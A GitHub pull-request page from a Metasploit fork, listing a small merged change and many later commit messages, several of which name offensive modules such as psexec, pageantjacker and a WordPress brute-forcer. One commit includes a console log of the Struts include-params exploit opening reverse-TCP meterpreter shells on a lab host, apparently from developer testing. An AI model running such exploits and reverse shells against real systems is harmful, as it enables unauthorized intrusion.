Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Use opts.usage instead of a Table #1

Merged

Conversation

jlee-r7
Copy link

@jlee-r7 jlee-r7 commented Oct 22, 2012

No description provided.

thelightcosine added a commit that referenced this pull request Oct 22, 2012
Use opts.usage instead of a Table
@thelightcosine thelightcosine merged commit 4f9385a into thelightcosine:findpids Oct 22, 2012
@jlee-r7
Copy link
Author

jlee-r7 commented Oct 22, 2012

rapid7#768

thelightcosine pushed a commit that referenced this pull request Oct 30, 2012
Loop management, timeouts, and verbosity by todb is full of win
thelightcosine pushed a commit that referenced this pull request Dec 7, 2012
thelightcosine pushed a commit that referenced this pull request Dec 7, 2012
thelightcosine pushed a commit that referenced this pull request Dec 7, 2012
Psexec command Clenaup.  Works for me, good to go!
thelightcosine pushed a commit that referenced this pull request Dec 7, 2012
thelightcosine pushed a commit that referenced this pull request Jan 28, 2013
thelightcosine pushed a commit that referenced this pull request Jan 28, 2013
thelightcosine pushed a commit that referenced this pull request Jan 28, 2013
assuring stdapi loads on meterpreter
thelightcosine pushed a commit that referenced this pull request Jan 28, 2013
thelightcosine pushed a commit that referenced this pull request Feb 4, 2013
thelightcosine pushed a commit that referenced this pull request Feb 18, 2013
using always a vbs file to drop exe
thelightcosine pushed a commit that referenced this pull request Feb 18, 2013
This is all just formatting, ref additions, etc.  Nothing substantial so I'll just merge and test as I'm trying to figure out what's up with failing on @rvazquez-r7's app.
thelightcosine pushed a commit that referenced this pull request Mar 25, 2013
Make it clear that you're deleting all loot
thelightcosine pushed a commit that referenced this pull request Mar 25, 2013
thelightcosine pushed a commit that referenced this pull request Apr 16, 2013
Exe only patch : avoid merge conflict and don't use win32pe_only everywhere by default.
thelightcosine pushed a commit that referenced this pull request Apr 16, 2013
cleanup for nagios_nrpe_arguments
thelightcosine pushed a commit that referenced this pull request Apr 16, 2013
testing completed. I see no issues with the proposed changes, tempfiles and quickfile work fine.
thelightcosine pushed a commit that referenced this pull request Apr 16, 2013
thelightcosine pushed a commit that referenced this pull request Apr 16, 2013
thelightcosine pushed a commit that referenced this pull request May 5, 2013
thelightcosine pushed a commit that referenced this pull request May 24, 2013
thelightcosine pushed a commit that referenced this pull request May 28, 2013
thelightcosine pushed a commit that referenced this pull request Jun 1, 2013
thelightcosine pushed a commit that referenced this pull request Jun 1, 2013
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
thelightcosine pushed a commit that referenced this pull request Jun 27, 2013
Final cleanup for rfcode_reader_enum
thelightcosine pushed a commit that referenced this pull request Jun 27, 2013
thelightcosine pushed a commit that referenced this pull request Oct 5, 2015
update pageantjacker to run as part of extapi
thelightcosine pushed a commit that referenced this pull request Nov 3, 2015
thelightcosine pushed a commit that referenced this pull request Nov 3, 2015
Clean up Msf::Sessions::MainframeShell
thelightcosine pushed a commit that referenced this pull request Nov 9, 2015
Fix download of files on linux
thelightcosine pushed a commit that referenced this pull request Nov 30, 2015
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
thelightcosine pushed a commit that referenced this pull request Jan 19, 2016
thelightcosine pushed a commit that referenced this pull request Jan 22, 2016
thelightcosine pushed a commit that referenced this pull request Feb 2, 2016
Update WordPress XMLRPC Massive Bruteforce
thelightcosine pushed a commit that referenced this pull request Mar 1, 2016
thelightcosine pushed a commit that referenced this pull request Mar 1, 2016
thelightcosine pushed a commit that referenced this pull request Jun 20, 2016
thelightcosine pushed a commit that referenced this pull request Jun 20, 2016
thelightcosine pushed a commit that referenced this pull request Jun 22, 2016
thelightcosine pushed a commit that referenced this pull request Jun 28, 2016
thelightcosine pushed a commit that referenced this pull request Jul 5, 2016
Fix some silly things in payload land
thelightcosine pushed a commit that referenced this pull request Sep 12, 2016
thelightcosine pushed a commit that referenced this pull request Sep 28, 2016
thelightcosine pushed a commit that referenced this pull request Sep 28, 2016
…pt-fix

Fixed interactive password prompt issue
thelightcosine pushed a commit that referenced this pull request Sep 28, 2016
thelightcosine pushed a commit that referenced this pull request Oct 11, 2016
…ug_fix

Fixed false positive bug in Oracle TNS Listener Checker module
thelightcosine pushed a commit that referenced this pull request Nov 3, 2016
Added user logging into the db and humored rubocop
thelightcosine pushed a commit that referenced this pull request Dec 9, 2016
thelightcosine pushed a commit that referenced this pull request Dec 29, 2016
Please the rubocop gods (unless they are dumb)
thelightcosine pushed a commit that referenced this pull request Jan 6, 2017
thelightcosine pushed a commit that referenced this pull request Mar 28, 2017
fix missing payloads_spec
thelightcosine pushed a commit that referenced this pull request Mar 28, 2017
Convert to CmdStager for R7000 exploit
thelightcosine pushed a commit that referenced this pull request Mar 28, 2017
Update freesshd_authbypass to use CmdStager fully
thelightcosine pushed a commit that referenced this pull request Mar 28, 2017
thelightcosine pushed a commit that referenced this pull request May 18, 2017
Pass msftidy for moxa_credentials_recovery.rb
thelightcosine pushed a commit that referenced this pull request Jun 19, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
3 participants